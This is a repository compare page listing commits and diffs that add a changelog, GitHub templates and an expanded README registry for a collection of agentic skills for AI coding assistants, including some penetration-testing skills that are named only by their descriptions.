ayrisdev/app-store-optimization
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: ayrisdev:v0.2.0
Branches Tags
ayrisdev:main ayrisdev:copilot/fix-css-parsing-error
ayrisdev:v5.6.0 ayrisdev:v5.5.0 ayrisdev:v5.4.0 ayrisdev:v5.3.0 ayrisdev:v5.2.0 ayrisdev:v5.1.0 ayrisdev:v5.0.0 ayrisdev:v4.11.0 ayrisdev:v4.10.0 ayrisdev:v4.9.0 ayrisdev:v4.8.0 ayrisdev:v4.7.0 ayrisdev:v4.6.0 ayrisdev:v4.5.0 ayrisdev:v4.4.0 ayrisdev:v4.3.0 ayrisdev:v4.2.0 ayrisdev:v4.1.0 ayrisdev:v4.0.0 ayrisdev:v3.5.0 ayrisdev:v3.4.0 ayrisdev:v3.3.0 ayrisdev:v3.2.0 ayrisdev:v3.1.0 ayrisdev:v3.0.0 ayrisdev:v2.15.0 ayrisdev:v2.14.0 ayrisdev:v2.13.0 ayrisdev:v2.12.0 ayrisdev:v2.11.0 ayrisdev:v2.10.0 ayrisdev:v2.9.0 ayrisdev:v2.8.0 ayrisdev:v2.7.0 ayrisdev:v2.6.0 ayrisdev:v2.5.0 ayrisdev:v2.4.0 ayrisdev:v2.3.0 ayrisdev:v1.0.0 ayrisdev:v0.7.0 ayrisdev:v0.6.0 ayrisdev:v0.5.0 ayrisdev:v0.4.0 ayrisdev:v0.3.0 ayrisdev:v0.2.0 ayrisdev:v0.1.0
..
compare: ayrisdev:v1.0.0
Branches Tags
ayrisdev:main ayrisdev:copilot/fix-css-parsing-error
ayrisdev:v5.6.0 ayrisdev:v5.5.0 ayrisdev:v5.4.0 ayrisdev:v5.3.0 ayrisdev:v5.2.0 ayrisdev:v5.1.0 ayrisdev:v5.0.0 ayrisdev:v4.11.0 ayrisdev:v4.10.0 ayrisdev:v4.9.0 ayrisdev:v4.8.0 ayrisdev:v4.7.0 ayrisdev:v4.6.0 ayrisdev:v4.5.0 ayrisdev:v4.4.0 ayrisdev:v4.3.0 ayrisdev:v4.2.0 ayrisdev:v4.1.0 ayrisdev:v4.0.0 ayrisdev:v3.5.0 ayrisdev:v3.4.0 ayrisdev:v3.3.0 ayrisdev:v3.2.0 ayrisdev:v3.1.0 ayrisdev:v3.0.0 ayrisdev:v2.15.0 ayrisdev:v2.14.0 ayrisdev:v2.13.0 ayrisdev:v2.12.0 ayrisdev:v2.11.0 ayrisdev:v2.10.0 ayrisdev:v2.9.0 ayrisdev:v2.8.0 ayrisdev:v2.7.0 ayrisdev:v2.6.0 ayrisdev:v2.5.0 ayrisdev:v2.4.0 ayrisdev:v2.3.0 ayrisdev:v1.0.0 ayrisdev:v0.7.0 ayrisdev:v0.6.0 ayrisdev:v0.5.0 ayrisdev:v0.4.0 ayrisdev:v0.3.0 ayrisdev:v0.2.0 ayrisdev:v0.1.0

36 Commits
v0.2.0 ... v1.0.0

Author SHA1 Message Date
sck_0
d7be8ef49f docs: add comprehensive CHANGELOG.md with version history 2026-01-19 19:40:53 +01:00
sck_0
e9a4d402ff docs: add Marketing & Growth category to Features table 2026-01-19 19:32:41 +01:00
sck_0
e8ad28df0d feat: add 23 marketing skills from coreyhaines31/marketingskills 
Added marketing skills for:
- CRO: page-cro, signup-flow-cro, onboarding-cro, form-cro, popup-cro, paywall-upgrade-cro
- Content: copywriting, copy-editing, email-sequence
- SEO: seo-audit, programmatic-seo, schema-markup, competitor-alternatives
- Paid: paid-ads, social-content
- Growth: referral-program, launch-strategy, free-tool-strategy
- Analytics: ab-test-setup, analytics-tracking
- Strategy: pricing-strategy, marketing-ideas, marketing-psychology

Total skills now: 179
License: MIT
Source: https://github.com/coreyhaines31/marketingskills
 2026-01-19 19:29:05 +01:00
sck_0
11b94d265e feat: Add Moodle External API Development skill (#6) 
- Merged PR from LocNguyenSGU
- Updated skill count to 156
- Added skill entry to README and skills_index.json
 2026-01-19 17:36:06 +01:00
Nguyen Huu Loc
74c7e5f330 feat: Add Moodle External API Development skill (#6) 
- Add comprehensive skill for creating custom Moodle LMS web service APIs
- Cover parameter validation, database operations, and error handling
- Include real-world examples from local_userlog plugin
- Provide step-by-step guide for quiz creation, course modules, and access restrictions
- Add testing methods (web service client, curl, JavaScript)
- Document common pitfalls and debugging checklist
 2026-01-19 17:34:27 +01:00
sck_0
b76ad28225 fix: correct skill count from 189 to 155 
- Updated README.md with correct skill count
- Fixed generate_index.py to exclude .disabled folder
- Fixed validate_skills.py to exclude .disabled folder
- Regenerated skills_index.json with 155 skills
 2026-01-19 12:47:02 +01:00
sck_0
a1a1178f4b docs: sort Features & Categories table alphabetically 2026-01-19 12:35:24 +01:00
sck_0
1c66f65341 docs: sort skill registry table alphabetically 2026-01-19 12:33:47 +01:00
sck_0
8678549bfb docs: add 57 new skill entries to registry table 
- Updated Features & Categories table with 3 new categories:
  - AI Agents & LLM (~30 skills)
  - Integrations & APIs (~25 skills)
  - Maker Tools (~11 skills)
- Added 57 new skill entries to Full Skill Registry table
- All entries from vibeship-spawner-skills now documented
 2026-01-19 12:31:42 +01:00
sck_0
3d9f9f347f docs: update README with 189 skills count and Spawner credits 
- Updated all skill counts from 133 to 189
- Fixed TOC link fragment for registry
- Added vibeship-spawner-skills to Credits (Apache 2.0)
- Regenerated skills_index.json
 2026-01-19 12:21:55 +01:00
sck_0
b5675d55ce feat: Add 57 skills from vibeship-spawner-skills 
Ported 3 categories from Spawner Skills (Apache 2.0):
- AI Agents (21 skills): langfuse, langgraph, crewai, rag-engineer, etc.
- Integrations (25 skills): stripe, firebase, vercel, supabase, etc.
- Maker Tools (11 skills): micro-saas-launcher, browser-extension-builder, etc.

All skills converted from 4-file YAML to SKILL.md format.
Source: https://github.com/vibeforge1111/vibeship-spawner-skills
 2026-01-19 12:18:43 +01:00
sck_0
6dcb7973ad feat: add shopify-development skill and update registry count to 133 2026-01-19 11:52:29 +01:00
“vuth-dogo”
9850b6b8e7 feat: add shopify-development skill 
- Add comprehensive Shopify development skill with validated GraphQL
- Fixed 4 mutations using Shopify MCP (fulfillmentCreate, appSubscription, etc.)
- Added shopify_graphql.py utilities with pagination & rate limiting
- Updated API version to 2026-01
- Added zircote/.claude as reference source
 2026-01-19 17:30:49 +07:00
sickn33
46d575b8d0 Update README with additional AI tools and skills 2026-01-18 08:09:36 +01:00
sck_0
02fab354e0 feat(SEO): optimize README for all AI coding tools 
- Updated title to include Claude Code, Gemini CLI, Cursor, Copilot
- Added 7 platform badges (Claude, Gemini, Codex, Cursor, Copilot, OpenCode, Antigravity)
- Added new '🔌 Compatibility' section with installation paths
- Expanded installation instructions for each platform
- Updated keywords with comprehensive AI coding terms
- Added GitHub Topics section for maintainers

SEO targets: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE,
GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding
 2026-01-18 08:05:49 +01:00
sck_0
226a7596cb docs: add BlockRun skill and update registry count to 132 2026-01-18 07:57:25 +01:00
sck_0
11c16dbe27 Merge branch 'pr-1' 2026-01-18 07:56:25 +01:00
sck_0
95eeb1dd4b docs: update skill count to 131 and regenerate index after agent-manager-skill merge 2026-01-18 07:52:10 +01:00
sickn33
b1e4d61715 Add agent-manager-skill 
Thanks for the contribution! Lightweight tmux-based agent lifecycle manager.
 2026-01-18 07:49:39 +01:00
Owen Wu
d17e7bc767 Add agent-manager-skill 
Co-authored-by: factory-droid[bot] <138933559+factory-droid[bot]@users.noreply.github.com>
 2026-01-17 22:07:17 -08:00
sck_0
450a8a95a5 fix: remove local config files from repository 2026-01-16 18:19:21 +01:00
sck_0
7a14904fd3 docs: update Features & Categories section with comprehensive categorization 2026-01-16 18:17:42 +01:00
sck_0
59a349075e chore: remove MAINTENANCE.md, walkthrough.md and .agent/rules 2026-01-16 18:12:49 +01:00
sck_0
d8b9ac19b2 docs: update readme with full skill registry table and cybersecurity tools 2026-01-16 18:03:27 +01:00
sck_0
68a457b96b docs: refine MAINTENANCE.md with detailed README instructions 2026-01-16 18:00:44 +01:00
sck_0
98756d75ae docs: add MAINTENANCE.md protocol 2026-01-16 17:59:02 +01:00
sck_0
4ee569d5d5 feat: add claude-code-guide and import security skills 2026-01-16 17:56:47 +01:00
sck_0
8a4b4383e8 chore: add walkthrough and agent rules 2026-01-16 17:50:17 +01:00
sck_0
9d09626fd2 docs: populate full skill registry with all 71 skills 2026-01-16 17:47:18 +01:00
sck_0
014da3e744 docs: update skill count to 71 in README 2026-01-16 17:45:09 +01:00
sck_0
113bc99e47 docs: add openai/skills to credits in README 2026-01-16 17:43:22 +01:00
sck_0
3e46a495c9 feat: add address-github-comments and concise-planning skills, improve writing-skills 2026-01-16 17:42:23 +01:00
sck_0
faf478f389 feat(ui-ux-pro-max): update to v2.0 with Design System Generator and 11 tech stacks 2026-01-16 17:34:54 +01:00
sck_0
266cbf4c6c docs: optimize SEO and add GitHub workflow files 2026-01-16 17:25:20 +01:00
sck_0
f8eaf7bd50 feat: add 7 new skills from GitHub repo analysis 
New skills:
- prompt-library: Curated role-based and task-specific prompt templates
- javascript-mastery: 33+ essential JavaScript concepts
- llm-app-patterns: RAG pipelines, agent architectures, LLMOps
- workflow-automation: Multi-step automation and API integration
- autonomous-agent-patterns: Tool design, permissions, browser automation
- bun-development: Bun runtime, testing, bundling, Node.js migration
- github-workflow-automation: AI PR reviews, issue triage, CI/CD

Sources: n8n, awesome-chatgpt-prompts, dify, gemini-cli, bun, 33-js-concepts, cline, codex

Total skills: 62 → 69
 2026-01-16 16:09:39 +01:00
1bcMax
4dcd96e484 Add BlockRun: Agent Wallet for LLM Micropayments 
Adds a skill that gives AI agents a crypto wallet (USDC on Base) to
autonomously pay for capabilities they lack:

- Image generation (DALL-E, Nano Banana)
- Real-time X/Twitter data (Grok Live Search)
- Second opinions (GPT-5, DeepSeek, Gemini)
- 30+ models from 5 providers

Key features:
- No API keys needed - wallet pays per token
- Auto-wallet creation on first use
- Works with Claude Code and Antigravity
- Budget tracking and spending controls

More info: https://github.com/BlockRunAI/blockrun-agent-wallet
 2026-01-15 02:44:28 -08:00
169 changed files with 43871 additions and 1557 deletions
Expand all files Collapse all files

8
.github/CODEOWNERS vendored Normal file
View File

@@ -0,0 +1,8 @@
# Global owners
* @sickn33
# Skills
/skills/ @sickn33
# Documentation
*.md @sickn33

33
.github/ISSUE_TEMPLATE/bug_report.md vendored Normal file
View File

@@ -0,0 +1,33 @@
---
name: Bug Report
about: Create a report to help us improve the skills
title: "[BUG] "
labels: bug
assignees: sickn33
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '...'
3. Scroll down to '...'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Environment (please complete the following information):**
- OS: [e.g. macOS, Windows]
- Tool: [e.g. Claude Code, Antigravity]
- Version [if known]
**Additional context**
Add any other context about the problem here.

19
.github/ISSUE_TEMPLATE/feature_request.md vendored Normal file
View File

@@ -0,0 +1,19 @@
---
name: Skill Request
about: Suggest a new skill for the collection
title: "[REQ] "
labels: enhancement
assignees: sickn33
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex: I'm always frustrated when [...]
**Describe the solution you'd like**
A description of the skill you want. What trigger should it have? What files should it effect?
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

18
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file
View File

@@ -0,0 +1,18 @@
## Description
Please describe your changes. What skill are you adding or modifying?
## Checklist
- [ ] My skill follows the [creation guidelines](https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/skill-creator)
- [ ] I have run `validate_skills.py`
- [ ] I have added my name to the credits (if applicable)
## Type of Change
- [ ] New Skill
- [ ] Bug Fix
- [ ] Documentation Update
- [ ] Infrastructure
## Screenshots (if applicable)

6
.gitignore vendored Normal file
View File

@@ -0,0 +1,6 @@
MAINTENANCE.md
walkthrough.md
.agent/rules/
.gemini/
LOCAL_CONFIG.md

142
CHANGELOG.md Normal file
View File

@@ -0,0 +1,142 @@
# Changelog
All notable changes to the **Antigravity Awesome Skills** collection are documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
---
## [1.0.0] - 2026-01-19 - "Marketing Edition"
### Added
- **23 Marketing & Growth skills** from [coreyhaines31/marketingskills](https://github.com/coreyhaines31/marketingskills):
- **CRO**: `page-cro`, `signup-flow-cro`, `onboarding-cro`, `form-cro`, `popup-cro`, `paywall-upgrade-cro`
- **Content**: `copywriting`, `copy-editing`, `email-sequence`
- **SEO**: `seo-audit`, `programmatic-seo`, `schema-markup`, `competitor-alternatives`
- **Paid**: `paid-ads`, `social-content`
- **Growth**: `referral-program`, `launch-strategy`, `free-tool-strategy`
- **Analytics**: `ab-test-setup`, `analytics-tracking`
- **Strategy**: `pricing-strategy`, `marketing-ideas`, `marketing-psychology`
- New "Marketing & Growth" category in Features table
### Changed
- Total skills count: **179**
---
## [0.7.0] - 2026-01-19 - "Education Edition"
### Added
- **Moodle External API Development** skill via PR #6
- Comprehensive Moodle LMS web service API development
### Changed
- Total skills count: **156**
---
## [0.6.0] - 2026-01-19 - "Vibeship Integration"
### Added
- **57 skills** from [vibeforge1111/vibeship-spawner-skills](https://github.com/vibeforge1111/vibeship-spawner-skills):
- AI Agents category (~30 skills)
- Integrations & APIs (~25 skills)
- Maker Tools (~11 skills)
- Alphabetically sorted skill registry
### Changed
- Total skills count: **155**
---
## [0.5.0] - 2026-01-18 - "Agent Manager"
### Added
- **Agent Manager Skill** - Multi-agent orchestration via tmux
- Major repository expansion with community contributions
### Changed
- Total skills count: **131**
---
## [0.4.0] - 2026-01-18 - "Security Fortress"
### Added
- **60+ Cybersecurity skills** from [zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide):
- Ethical Hacking Methodology
- Metasploit Framework
- Burp Suite Testing
- SQLMap, Active Directory, AWS Pentesting
- OWASP Top 100 Vulnerabilities
- Red Team Tools
- `claude-code-guide` skill
### Changed
- Total skills count: ~90
---
## [0.3.0] - 2026-01-17 - "First Stable Registry"
### Added
- Complete skill registry table in README
- GitHub workflow automation
- SEO optimizations
### Changed
- Total skills count: **71**
---
## [0.2.0] - 2026-01-16 - "Official Skills"
### Added
- **Official Anthropic skills** integration
- **Vercel Labs skills** integration
- BlockRun: Agent Wallet for LLM Micropayments
- 7 new skills from GitHub analysis
### Changed
- Total skills count: ~65
---
## [0.1.0] - 2026-01-15 - "Initial Release"
### Added
- **58 core skills** aggregated from community:
- [obra/superpowers](https://github.com/obra/superpowers) - Original Superpowers
- [guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills) - Core extensions
- [diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase) - Infrastructure skills
- [ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase) - React UI patterns
- [travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills) - Loki Mode
- [alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills) - Senior Engineering
- Universal **SKILL.md** format
- Compatibility with Claude Code, Gemini CLI, Cursor, Copilot, Antigravity
---
## Credits
See [README.md](README.md#credits--sources) for full attribution.
## License
MIT License - See [LICENSE](LICENSE) for details.

341
README.md
View File

@@ -1,23 +1,60 @@
# 🌌 Antigravity Awesome Skills
# 🌌 Antigravity Awesome Skills: 179+ Agentic Skills for Claude Code, Gemini CLI, Cursor, Copilot & More
> **The Ultimate Collection of 60+ Agentic Skills for Claude Code (Antigravity)**
> **The Ultimate Collection of 179+ Universal Agentic Skills for AI Coding Assistants — Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode**
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Claude Code](https://img.shields.io/badge/AI-Claude%20Code-purple)](https://claude.ai)
[![Agentic](https://img.shields.io/badge/Agentic-Framework-blue)](https://github.com/guanyang/antigravity-skills)
[![Claude Code](https://img.shields.io/badge/Claude%20Code-Anthropic-purple)](https://claude.ai)
[![Gemini CLI](https://img.shields.io/badge/Gemini%20CLI-Google-blue)](https://github.com/google-gemini/gemini-cli)
[![Codex CLI](https://img.shields.io/badge/Codex%20CLI-OpenAI-green)](https://github.com/openai/codex)
[![Cursor](https://img.shields.io/badge/Cursor-AI%20IDE-orange)](https://cursor.sh)
[![Copilot](https://img.shields.io/badge/GitHub%20Copilot-VSCode-lightblue)](https://github.com/features/copilot)
[![OpenCode](https://img.shields.io/badge/OpenCode-CLI-gray)](https://github.com/opencode-ai/opencode)
[![Antigravity](https://img.shields.io/badge/Antigravity-DeepMind-red)](https://github.com/anthropics/antigravity)
**Antigravity Awesome Skills** is a curated, battle-tested collection of **62 high-performance skills** compatible with both **Antigravity** and **Claude Code**, including official skills from **Anthropic** and **Vercel Labs**.
**Antigravity Awesome Skills** is a curated, battle-tested library of **179 high-performance agentic skills** designed to work seamlessly across all major AI coding assistants:
- 🟣 **Claude Code** (Anthropic CLI)
- 🔵 **Gemini CLI** (Google DeepMind)
- 🟢 **Codex CLI** (OpenAI)
- 🔴 **Antigravity IDE** (Google DeepMind)
- 🩵 **GitHub Copilot** (VSCode Extension)
- 🟠 **Cursor** (AI-native IDE)
-**OpenCode** (Open-source CLI)
This repository provides essential skills to transform your AI assistant into a **full-stack digital agency**, including official capabilities from **Anthropic**, **OpenAI**, **Google**, and **Vercel Labs**.
## 📍 Table of Contents
- [🔌 Compatibility](#-compatibility)
- [Features & Categories](#features--categories)
- [Full Skill Registry](#full-skill-registry-6262)
- [Full Skill Registry](#full-skill-registry-155155)
- [Installation](#installation)
- [How to Contribute](#how-to-contribute)
- [Credits & Sources](#credits--sources)
- [License](#license)
Whether you are using the Google Deepmind Antigravity framework or the standard Anthropic Claude Code CLI, these skills are designed to drop right in and supercharge your agent.
---
## 🔌 Compatibility
These skills follow the universal **SKILL.md** format and work with any AI coding assistant that supports agentic skills:
| Tool | Type | Compatibility | Installation Path |
| ------------------- | --------- | ------------- | ---------------------------------------- |
| **Claude Code** | CLI | ✅ Full | `.claude/skills/` or `.agent/skills/` |
| **Gemini CLI** | CLI | ✅ Full | `.gemini/skills/` or `.agent/skills/` |
| **Codex CLI** | CLI | ✅ Full | `.codex/skills/` or `.agent/skills/` |
| **Antigravity IDE** | IDE | ✅ Full | `.agent/skills/` |
| **Cursor** | IDE | ✅ Full | `.cursor/skills/` or project root |
| **GitHub Copilot** | Extension | ⚠️ Partial | Copy skill content to `.github/copilot/` |
| **OpenCode** | CLI | ✅ Full | `.opencode/skills/` or `.agent/skills/` |
> [!TIP]
> Most tools auto-discover skills in `.agent/skills/`. For maximum compatibility, clone to this directory.
---
Whether you are using **Gemini CLI**, **Claude Code**, **Codex CLI**, **Cursor**, **GitHub Copilot**, **Antigravity**, or **OpenCode**, these skills are designed to drop right in and supercharge your AI agent.
This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.
@@ -25,66 +62,211 @@ This repository aggregates the best capabilities from across the open-source com
The repository is organized into several key areas of expertise:
| Category | Skills Included |
| :----------------------- | :------------------------------------------------------------------------------------- |
| **🎨 Creative & Design** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz |
| **🛠️ Development** | TDD, Systematic Debugging, Webapp Testing, Backend/Frontend Guidelines, React Patterns |
| **🛡️ Cybersecurity** | Ethical Hacking, AWS Pentesting, OWASP Top 100, Pentest Checklists |
| **🛸 Autonomous** | **Loki Mode** (Startup-in-a-box), Subagent Orchestration, Parallel Execution |
| **📈 Strategy** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming |
| **🏗️ Infrastructure** | Linux Shell Scripting, Git Worktrees, Conventional Commits, File Organization |
| Category | Skills Count | Key Skills Included |
| :-------------------------- | :----------- | :--------------------------------------------------------------------------------------------------------------------------- |
| **🛸 Autonomous & Agentic** | **~8** | Loki Mode (Startup-in-a-box), Subagent Driven Dev, Dispatching Parallel Agents, Planning With Files, Skill Creator/Developer |
| **🔌 Integrations & APIs** | **~25** | Stripe, Firebase, Supabase, Vercel, Clerk Auth, Twilio, Discord Bot, Slack Bot, GraphQL, AWS Serverless |
| **🛡️ Cybersecurity** | **~50** | Ethical Hacking, Metasploit, Burp Suite, SQLMap, Active Directory, AWS/Cloud Pentesting, OWASP Top 100, Red Team Tools |
| **🎨 Creative & Design** | **~10** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz, Web Artifacts |
| **🛠️ Development** | **~25** | TDD, Systematic Debugging, React Patterns, Backend/Frontend Guidelines, Senior Fullstack, Software Architecture |
| **🏗️ Infrastructure & Git** | **~8** | Linux Shell Scripting, Git Worktrees, Git Pushing, Conventional Commits, File Organization, GitHub Workflow Automation |
| **🤖 AI Agents & LLM** | **~30** | LangGraph, CrewAI, Langfuse, RAG Engineer, Prompt Engineer, Voice Agents, Browser Automation, Agent Memory Systems |
| **🔄 Workflow & Planning** | **~6** | Writing Plans, Executing Plans, Concise Planning, Verification Before Completion, Code Review (Requesting/Receiving) |
| **📄 Document Processing** | **~4** | DOCX (Official), PDF (Official), PPTX (Official), XLSX (Official) |
| **🧪 Testing & QA** | **~4** | Webapp Testing, Playwright Automation, Test Fixing, Testing Patterns |
| **📈 Product & Strategy** | **~8** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming, Internal Comms |
| **📣 Marketing & Growth** | **~23** | Page CRO, Copywriting, SEO Audit, Paid Ads, Email Sequence, Pricing Strategy, Referral Program, Launch Strategy |
| **🚀 Maker Tools** | **~11** | Micro-SaaS Launcher, Browser Extension Builder, Telegram Bot, AI Wrapper Product, Viral Generator, 3D Web Experience |
---
## Full Skill Registry (62/62)
## Full Skill Registry (179/179)
Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code.
> [!NOTE] > **Document Skills**: We provide both **community** and **official Anthropic** versions for DOCX, PDF, PPTX, and XLSX. Locally, the official versions are used by default (via symlinks). In the repository, both versions are available for flexibility.
| Skill Name | Description | Path |
| :------------------------------- | :------------------------------------------------------------ | :--------------------------------------------- |
| **Algorithmic Art** | Creative generative art using p5.js and seeded randomness. | `skills/algorithmic-art` |
| **App Store Optimization** | Complete ASO toolkit for iOS and Android app performance. | `skills/app-store-optimization` |
| **AWS Pentesting** | Specialized security assessment for Amazon Web Services. | `skills/aws-penetration-testing` |
| **Backend Guidelines** | Core architecture patterns for Node/Express microservices. | `skills/backend-dev-guidelines` |
| **Brainstorming** | Requirement discovery and intent exploration framework. | `skills/brainstorming` |
| **Brand Guidelines (Anthropic)** | Official Anthropic brand styling and visual standards. | `skills/brand-guidelines-anthropic` ⭐ NEW |
| **Brand Guidelines (Community)** | Community-contributed brand guidelines and templates. | `skills/brand-guidelines-community` |
| **Canvas Design** | Beautiful static visual design in PDF and PNG. | `skills/canvas-design` |
| **Claude D3.js** | Advanced data visualization with D3.js. | `skills/claude-d3js-skill` |
| **Content Creator** | SEO-optimized marketing and brand voice toolkit. | `skills/content-creator` |
| **Core Components** | Design system tokens and baseline UI patterns. | `skills/core-components` |
| **Doc Co-authoring** | Structured workflow for technical documentation. | `skills/doc-coauthoring` |
| **DOCX (Official)** | Official Anthropic MS Word document manipulation. | `skills/docx-official` ⭐ NEW |
| **Ethical Hacking** | Comprehensive penetration testing lifecycle methodology. | `skills/ethical-hacking-methodology` |
| **Frontend Design** | Production-grade UI component implementation. | `skills/frontend-design` |
| **Frontend Guidelines** | Modern React/TS development patterns and file structure. | `skills/frontend-dev-guidelines` |
| **Git Pushing** | Automated staging and conventional commits. | `skills/git-pushing` |
| **Internal Comms (Anthropic)** | Official Anthropic corporate communication templates. | `skills/internal-comms-anthropic` ⭐ NEW |
| **Internal Comms (Community)** | Community-contributed communication templates. | `skills/internal-comms-community` |
| **Kaizen** | Continuous improvement and error-proofing (Poka-Yoke). | `skills/kaizen` |
| **Linux Shell Scripting** | Production-ready shell scripts for automation. | `skills/linux-shell-scripting` |
| **Loki Mode** | Fully autonomous startup development engine. | `skills/loki-mode` |
| **MCP Builder** | High-quality Model Context Protocol (MCP) server creation. | `skills/mcp-builder` |
| **NotebookLM** | Source-grounded querying via Google NotebookLM. | `skills/notebooklm` |
| **PDF (Official)** | Official Anthropic PDF document manipulation. | `skills/pdf-official` ⭐ NEW |
| **Pentest Checklist** | Structured security assessment planning and scoping. | `skills/pentest-checklist` |
| **PPTX (Official)** | Official Anthropic PowerPoint manipulation. | `skills/pptx-official` ⭐ NEW |
| **Product Toolkit** | RICE prioritization and product discovery frameworks. | `skills/product-manager-toolkit` |
| **Prompt Engineering** | Expert patterns for LLM instruction optimization. | `skills/prompt-engineering` |
| **React Best Practices** | Vercel's 40+ performance optimization rules for React. | `skills/react-best-practices` ⭐ NEW (Vercel) |
| **React UI Patterns** | Standardized loading states and error handling for React. | `skills/react-ui-patterns` |
| **Senior Architect** | Scalable system design and architecture diagrams. | `skills/senior-architect` |
| **Skill Creator** | Meta-skill for building high-performance agentic skills. | `skills/skill-creator` |
| **Software Architecture** | Quality-focused design principles and analysis. | `skills/software-architecture` |
| **Systematic Debugging** | Root cause analysis and structured fix verification. | `skills/systematic-debugging` |
| **TDD** | Test-Driven Development workflow and red-green-refactor. | `skills/test-driven-development` |
| **UI/UX Pro Max** | Advanced design intelligence and 50+ styling options. | `skills/ui-ux-pro-max` |
| **Web Artifacts** | Complex React/Tailwind/Shadcn UI artifact builder. | `skills/web-artifacts-builder` |
| **Web Design Guidelines** | Vercel's 100+ UI/UX audit rules (accessibility, performance). | `skills/web-design-guidelines` ⭐ NEW (Vercel) |
| **Webapp Testing** | Local web application testing with Playwright. | `skills/webapp-testing` |
| **XLSX (Official)** | Official Anthropic Excel spreadsheet manipulation. | `skills/xlsx-official` ⭐ NEW |
| Skill Name | Description | Path |
| :-------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :--------------------------------------- |
| **3D Web Experience** | Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL. | `skills/3d-web-experience` |
| **A/B Test Setup** | Plan and implement A/B tests with proper experiment design, statistical significance, and test analysis. | `skills/ab-test-setup` |
| **Active Directory Attacks** | This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. | `skills/active-directory-attacks` |
| **Address GitHub Comments** | Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI. | `skills/address-github-comments` |
| **Agent Evaluation** | Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics. | `skills/agent-evaluation` |
| **Agent Manager Skill** | Use when you need to manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling. | `skills/agent-manager-skill` |
| **Agent Memory Systems** | Memory architecture for agents: short-term, long-term (vector stores), and cognitive architectures. | `skills/agent-memory-systems` |
| **Agent Tool Builder** | Tool design from schema to error handling. JSON Schema best practices, validation, and MCP. | `skills/agent-tool-builder` |
| **AI Agents Architect** | Expert in autonomous AI agents. Tool use, memory systems, planning strategies, multi-agent orchestration. | `skills/ai-agents-architect` |
| **AI Product** | LLM integration patterns, RAG architecture, prompt engineering, AI UX, and cost optimization. | `skills/ai-product` |
| **AI Wrapper Product** | Building products that wrap AI APIs into focused tools. Prompt engineering, cost management. | `skills/ai-wrapper-product` |
| **Algolia Search** | Algolia search implementation, indexing strategies, React InstantSearch, relevance tuning. | `skills/algolia-search` |
| **Algorithmic Art** | Creating algorithmic art using p5. | `skills/algorithmic-art` |
| **Analytics Tracking** | Set up analytics tracking with GA4, GTM, and custom event implementations for marketing measurement. | `skills/analytics-tracking` |
| **API Fuzzing for Bug Bounty** | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. | `skills/api-fuzzing-bug-bounty` |
| **App Store Optimization** | Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store. | `skills/app-store-optimization` |
| **Autonomous Agent Patterns** | "Design patterns for building autonomous coding agents. | `skills/autonomous-agent-patterns` |
| **Autonomous Agents** | AI systems that independently decompose goals, plan actions, execute tools. ReAct, reflection. | `skills/autonomous-agents` |
| **AWS Penetration Testing** | This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment. | `skills/aws-penetration-testing` |
| **AWS Serverless** | Serverless on AWS. Lambda, API Gateway, DynamoDB, SQS/SNS, SAM/CDK deployment. | `skills/aws-serverless` |
| **Azure Functions** | Azure Functions patterns. Isolated worker model, Durable Functions, cold start optimization. | `skills/azure-functions` |
| **Backend Guidelines** | Comprehensive backend development guide for Node. | `skills/backend-dev-guidelines` |
| **BlockRun** | Agent wallet for LLM micropayments. Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek"). | `skills/blockrun` |
